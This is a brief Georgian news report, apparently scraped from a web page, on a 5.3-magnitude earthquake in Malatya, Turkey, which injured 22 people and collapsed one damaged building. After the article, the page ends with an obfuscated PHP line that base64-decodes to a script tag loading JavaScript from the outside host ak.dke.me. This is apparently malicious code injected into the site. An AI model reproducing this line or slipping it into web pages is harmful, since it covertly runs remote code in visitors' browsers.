celsiusi
ავერსი საქკაბელი

თურქეთის აღმოსავლეთ ნაწილში, ქალაქ მალათიაში 5,3 მაგნიტუდის სიძლიერის მიწისძვრა დაფიქსირდა. ამის შესახებ ინფორმაციას ადგილობრივი მედია ქვეყნის კატასტროფებისა და საგანგებო სიტუაციების მართვის სამსახურზე დაყრდნობით ავრცელებს.

მათივე ცნობით, მიწისძვრის ეპიცენტრი იეშილიურტის რაიონში, შვიდი კილომეტრის სიღრმეზე აღმოჩნდა.

თურქეთის შინაგან საქმეთა მინისტრმა, ალი იერლიკაიამ აღნიშნა, რომ ყველა შესაბამისი ინსტიტუტი, მათ შორის კატასტროფებისა და საგანგებო სიტუაციების მართვის სამსახური მობილიზებულია მიწისძვრის შედეგად რაიმე ზიანის ან პრობლემის გამოსავლენად.

მიწისძვრის შედეგად დაღუპულთა შესახებ ინფორმაცია არ გავრცელებულა, თუმცა აღნიშნავენ, რომ პანიკის გამო საცხოვრებელი სახლების აივნებიდან გადახტომის შედეგად 22 ადამიანი დაშავდა.
მიწისძვრა იგრძნობოდა ახლომდებარე პროვინციებშიც.

მალათიის გუბერნატორმა მედიასთან საუბრისას აღნიშნა, რომ მიტოვებული შენობა ერთ-ერთ რაიონში, რომელიც უკვე დაზიანდა 6 თებერვალს მომხდარი მიწისძვრის შედეგად, ამ მიწისძვრის შემდეგ დაინგრა.

მედიის ცნობით, რეგიონში იმყოფება ეროვნული სამედიცინო სამაშველო ჯგუფიც რაიმე პრობლემის გამოსავლენად, თუმცა ამ დრომდე არანაირი პრობლემა არ დაფიქსირებულა.

275
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");